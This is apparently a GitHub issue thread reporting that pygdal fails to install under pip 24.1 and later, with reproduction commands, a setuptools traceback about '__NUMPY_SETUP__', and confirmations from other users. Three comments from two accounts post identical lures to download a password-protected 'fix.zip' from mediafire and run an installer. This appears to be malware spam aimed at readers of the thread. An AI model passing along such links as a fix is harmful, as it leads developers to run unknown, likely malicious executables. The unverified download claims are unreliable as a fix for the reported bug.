### ISSUE TITLE
Issue with installing pygdal with pip 24.1

### ISSUE THREAD

**Issue by mvtm-dn** [nextgis/pygdal#91]
Installation failed when pip 24.1 or 24.2 was installed.
Environment: xUbuntu 22.04LTS, Python 3.10.12
Reproduction steps:
```bash
python -m venv .venv
.venv/bin/pip install pip=="24.1"
.venv/bin/pip install "pygdal==`gdal-config --version`.*"
```
Expecting successful installation
Got 

```
Collecting pygdal==3.4.1.*
  Downloading pygdal-3.4.1.10.tar.gz (497 kB)
  Installing build dependencies ... done
  Getting requirements to build wheel ... done
  Installing backend dependencies ... done
  Preparing metadata (pyproject.toml) ... error
  error: subprocess-exited-with-error
  
  × Preparing metadata (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [56 lines of output]
      running dist_info
      creating /tmp/pip-modern-metadata-a1ex0p6x/pygdal.egg-info
      writing /tmp/pip-modern-metadata-a1ex0p6x/pygdal.egg-info/PKG-INFO
      writing dependency_links to /tmp/pip-modern-metadata-a1ex0p6x/pygdal.egg-info/dependency_links.txt
      writing requirements to /tmp/pip-modern-metadata-a1ex0p6x/pygdal.egg-info/requires.txt
      writing top-level names to /tmp/pip-modern-metadata-a1ex0p6x/pygdal.egg-info/top_level.txt
      writing manifest file '/tmp/pip-modern-metadata-a1ex0p6x/pygdal.egg-info/SOURCES.txt'
      Traceback (most recent call last):
        File "/tmp/xxx/.venv/lib/python3.10/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 353, in <module>
          main()
        File "/tmp/xxx/.venv/lib/python3.10/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 335, in main
          json_out['return_val'] = hook(**hook_input['kwargs'])
        File "/tmp/xxx/.venv/lib/python3.10/site-packages/pip/_vendor/pyproject_hooks/_in_process/_in_process.py", line 149, in prepare_metadata_for_build_wheel
          return hook(metadata_directory, config_settings)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 373, in prepare_metadata_for_build_wheel
          self.run_setup()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 502, in run_setup
          super().run_setup(setup_script=setup_script)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/build_meta.py", line 318, in run_setup
          exec(code, locals())
        File "<string>", line 225, in <module>
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/__init__.py", line 111, in setup
          return distutils.core.setup(**attrs)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/core.py", line 184, in setup
          return run_commands(dist)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/core.py", line 200, in run_commands
          dist.run_commands()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 964, in run_commands
          self.run_command(cmd)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/dist.py", line 948, in run_command
          super().run_command(command)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/dist.py", line 983, in run_command
          cmd_obj.run()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/command/dist_info.py", line 93, in run
          self.egg_info.run()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 311, in run
          self.find_sources()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 319, in find_sources
          mm.run()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 540, in run
          self.add_defaults()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/command/egg_info.py", line 578, in add_defaults
          sdist.add_defaults(self)
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/command/sdist.py", line 105, in add_defaults
          super().add_defaults()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/command/sdist.py", line 250, in add_defaults
          self._add_defaults_ext()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/command/sdist.py", line 334, in _add_defaults_ext
          build_ext = self.get_finalized_command('build_ext')
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/cmd.py", line 303, in get_finalized_command
          cmd_obj.ensure_finalized()
        File "/tmp/pip-build-env-gze6b51h/overlay/lib/python3.10/site-packages/setuptools/_distutils/cmd.py", line 111, in ensure_finalized
          self.finalize_options()
        File "<string>", line 129, in finalize_options
        File "<string>", line 30, in get_numpy_include
      AttributeError: 'dict' object has no attribute '__NUMPY_SETUP__'
      [end of output]
  
  note: This error originates from a subprocess, and is likely not a problem with pip.
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.
```

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bart-maykin** [comment]
I also had trouble installing it with [uv pip install](https://github.com/astral-sh/uv/issues/1703#issuecomment-2494084579)

**Comment by 1riggs** [comment]
Same issue occurs when using pip 25.0.1
